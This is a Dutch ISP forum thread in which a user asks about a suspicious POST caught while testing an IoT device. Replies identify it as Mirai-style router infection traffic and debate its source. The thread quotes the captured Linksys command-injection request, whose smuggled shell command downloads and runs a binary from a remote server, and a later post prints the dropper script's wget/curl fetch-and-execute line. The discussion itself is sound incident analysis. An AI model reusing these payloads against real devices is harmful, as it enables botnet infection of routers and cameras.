vraag

Packet spoofing MITM

  • 29 april 2020
  • 13 reacties
  • 255 keer bekeken

Reputatie 1

Hoi,

 

Had een netcat (nc -k -l 8080) draaien om een GET/POST van een IoT device te inspecteren toen ik dit bericht ontving op het moment het IoT device de POST verstuurde.

POST /tmUnblock.cgi HTTP/1.1
Host: 147.75.67.253:80
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: /
User-Agent: python-requests/2.20.0
Content-Length: 227
Content-Type: application/x-www-form-urlencoded

ttcp_ip=-h+%60cd+%2Ftmp%3B+rm+-rf+mpsl%3B+wget+http%3A%2F%2F147.75.67.253%2Fbins%2Fmpsl%3B+chmod+777+mpsl%3B+.%2Fmpsl+linksys%60&action=&ttcp_num=2&ttcp_size=2&submit_button=&change_action=&commit=0&StartEPI=1


# URL decoded ziet het er zo uit

ttcp_ip=-h `cd /tmp; rm -rf mpsl; wget http://147.75.67.253/bins/mpsl; chmod 777 mpsl; ./mpsl linksys`&action=&ttcp_num=2&ttcp_size=2&submit_button=&change_action=&commit=0&StartEPI=1


Schijnbaar zit  er een MITM te spoofen. Dien ik me zorgen te maken?

Gr. Hansa


13 reacties

Reputatie 8

Waarschuwing:  Voor forum-lezers van dit bericht.
Voer niet de acties uit die ikzelf al heb uitgevoerd i.v.m. het risico van het
mogelijk binnenhalen van malware / virus.  Neem alleen kennis van deze informatie met de uitleg met schermvoorbeelden.

Vanuit de info van de voorgaande reactie heb ik in een webbrowser het opgegeven IP-adres
147.75.67.253  ingetikt waar „poort 80“ wordt vernoemd, wat een ingang is naar een web-server.

Ik kom dan in de „hoofdmap“ / directory van een web-server
Waar normaal een website te vinden zou zijn (met index bestand). Bij ontbreken van web-bestanden maar wel met „open“ rechten voor de directory, vindt men nu een inhoud met bestanden.
 

 

Ik had het voornemen het bestand  bins.sh  te downloaden om deze in een HEX editor te bekijken op inhoud. Het bestand werd meteen opgepikt door mijn (niet Windows) Firewall / Virusscanner
en geëlimineerd.

Doorgeklikt naar de inhoud van het mapje bins
 


Aan de bestandsnamen te zien gaat het om (erg) kleine aanvullende stukjes software, specifiek afgestemd op gebruik met bepaalde CPU’s.  Als je bepaalde apparatuur zou hebben m.b.t. die IoT apparaatjes die deze CPU’s gebruiken, zal naar ik denk het betreffende bestandje worden opgehaald en geïnstalleerd, wat dan weer een sleutel is tot verder gebruik.
Je weet niet welke “doos van Pandora” je daarmee opent??

In de code vanuit de eerste reactie hierboven vind ik tevens gegevens als:

  • linksys
  • submit button = & change
  • action
  • StartEPI=1

Of het kwaadaardig is of goedaardig kan ik niet beoordelen.
Maar lijkt me IMO weinig goeds te voorspellen?

Heb je toevallig een Linksys router??  (Word er mogelijk een instelling veranderd?).

Gezien de gebrekkige structuur van de server zelf, zonder beveiliging en geen benoeming van een domein op dat IP-adres met onder een domeinnaam dan ook een officieel geldig SSL certificaat, heb ik er eerlijk gezegd weinig vertrouwen in.

Zeker ook gezien mijn virusscanner die het eerdere bins.sh bestand al direct als virus bestempelt.
Echt zeker ervan zijn weet men echter niet, vandaar uit voorzorg de eerdere waarschuwing.
(Ook Linux en smartphone gebruikers met ARM CPU zouden moet oppassen).

Het is een algemeen bekend gegeven van veel IoT toepassingen. Vaak niet veilig. Je moet maar afwachten wat er wordt geleverd en wat het uiteindelijk achterliggend nog meer uithaalt met wat je dacht ermee te kunnen doen?.


De gegevens en Geo-locatie van de server:

https://browserleaks.com/ip/147.75.67.253

Reputatie 1

Geen Linksys router hier. Zo te zien staan de initiële bestanden (mpsl en bins.*) niet op de server. De hack zal dus niet werken. De inhoud bins.sh is een bash script. Deze schrijft de output van bins.arcx86 weg naar de remote server waar ook de malware staat (zie curl statement).

d /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://147.---.---.---/bins/bins.arcx86; curl -O http://147.---.---.---/bins/bins.arcx86;cat bins.arcx86 >owo;chmod +x *;./owo owo

De bestanden in bins/* zijn volgens Virustotal een trojan Linux.Mirai (Japans voor toekomst). https://en.wikipedia.org/wiki/Mirai_(malware). Het doel is om IP-camera’s en thuis routers te hacken om onderdeel van een botnet te worden.
 

Vooralsnog ga ik er vanuit dat er in hetzelfde netwerksegment ergens een router IP-packets spooft en beschouw ik het als een incident. Mocht ik meer info vinden, dan meld ik me weer.

Reputatie 8

De bestanden in bins/* zijn volgens Virustotal een trojan Linux.Mirai (Japans voor toekomst). https://en.wikipedia.org/wiki/Mirai_(malware). Het doel is om IP-camera’s en thuis routers te hacken om onderdeel van een botnet te worden.

Het zou kunnen betekenen dat de hack op een bepaalde datum “in de toekomst” wordt uitgevoerd??  Of althans dat probeert re doen.

Het lijkt me toch verstandiger in ieder geval je IoT apparaten waar kennelijk de oorzaak gezocht kan worden in het aanroepen van die connectie met die server, van dit soort ongein op te schonen?

Reputatie 1

Het lijkt me toch verstandiger in ieder geval je IoT apparaten waar kennelijk de oorzaak gezocht kan worden in het aanroepen van die connectie met die server, van dit soort ongein op te schonen?

Wat bedoel je hiermee? Ik ben toch niet de veroorzaker van deze hack?

Reputatie 8

Nee, jij bent op zichzelf niet de veroorzaker, maar er zit kennelijk wel een stukje malware/virus in een van die IoT apparaten wat dat veroorzaakt.

Vergelijk het met een virus op je PC.
Die wordt als het goed is toch ook door een (standaard) virusscanner eraf gehaald?
En anders wel door een extra scan erop los te laten.
Je wilt je eigen systemen toch schoon hebben??

Reputatie 1

Je spreekt hier over MITM. Dus dat kan overal vandaan komen. De setup was: Arduino-Uno → GPRS module → T-mobile APN → Internet →  Home network → PC-Linux.

Als het een van mijn eigen systemen zou zijn, dan zou het de GPRS module kunnen zijn. Hoewel deze made in China is, acht ik dit niet waarschijnlijk. Kan ook van mijn eigen router komen. Dat is overigens een ZTE van Telfort die niet via ssh te benaderen is. Ook made in China overigens en de meest waarschijnlijke boosdoener ;-) Maar hier heb ik helaas geen root access op, dus daar kan ik niks mee. Het zou mijn FW kunnen zijn (onwaarschijnlijk), mijn eigen Linux PC (is clean) of mss de interne switch. Ook dat acht ik onwaarschijnlijk. Zoals gezegd. Ik houd het bij een incident ;-)

Dankjewel voor je hulp!

Reputatie 8

Ik spreek op zichzelf niet over een MITM als je systeem zelf malware / een virus zou bevatten.

Maar ook als het wel om een MITM  (man-in-the-middle) attack zou gaan, is je systeem ten aanzien van connecties naar buiten veel te slecht beveiligd. Juist alle reden om het NIET te negeren en als incident te zien!

NU lijkt het dan misschien betrekkelijk onschuldig. Als je systeem en het data-verkeer met elders zo makkelijk is te onderscheppen, is die data even gemakkelijk door weer andere partijen te onderscheppen en uit te lezen met mogelijk veel meer kwalijke gevolgen?

Reputatie 1

Security spreekt uiteraard voor zich. Maar zover was ik nog niet.

Het betrof een simpele test, https, authenticatie, enz. was nog niet relevant. Vanwege de injectie van HTML in het verstuurde bericht, vroeg ik me af of het modem van Telfort wellicht de boosdoener is… Heb ondertussen meerdere query's gedraaid en heb verder geen afwijkingen meer gesignaleerd. Weet jij of er een mogelijkheid is om het modem (door Telfort) te (laten) inspecteren?

Reputatie 8

Als het de Telfort router zou zijn, zouden er  honderden / zo niet duizenden klachten meer zijn, en al lang zijn opgemerkt. Dus denk niet dat je het in die hoek zou moeten zoeken. Er valt ook helemaal niets te installeren op een Telfort router aan extra stukje firmware, die dit in gang zou zetten.

Reputatie 8
Badge +12

Hoi @Hansaplast, ik moet zeggen dat ik hier niets genoeg of eigenlijk niets van af weet. Ik zie Dat Babylonia je wel al goed op weg heeft geholpen. Hopelijk krijg je duidelijkheid of kan je het verhelpen. 

Reputatie 1

Hoi @Bart - Telfort , geeft niet. Ik ben het overigens oneens met @Babylonia ‘s laatste commentaar. Maar die discussie wil ik hier niet voeren. Dat gaat te ver in dit topic.

Reputatie 8

Je hoeft het er ook niet mee eens te zijn hoor. :laughing:

Maar het antwoord ligt al besloten in de allereerste regel die jezelf in je eerste reactie schreef,
dat het niet de Telfort modem/router is die de aanroep doet naar een dubieuze URL.

       Had een netcat (nc -k -l 8080) draaien om een GET/POST van een IoT device te inspecteren
       t
oen ik dit bericht ontving op het moment het IoT device de POST verstuurde.

Daar ligt reeds de kern waar het om draait.
(De modem/router is slechts doorgeefluik van data).

Er zijn pakweg 1,5 miljoen Telfort abonnees. (Cijfers van enkele jaren terug).
Tel daar dan nog pakweg minimaal 2 miljoen (?) KPN abonnees bij op.
Praat je over minimaal 3,5 miljoen abonnees met vergelijkbare modem/routers met hard- en firmware.

Als de modem/router zelf die aanroep zou doen naar zo'n totaal onbekende URL in Amerika,
was dat op die aantallen natuurlijk al lang eerder opgemerkt geweest.

Reputatie 8
Badge +12

Ik kan er niet over oordelen. Hoop dat je duidelijkheid krijgt. 

Reageer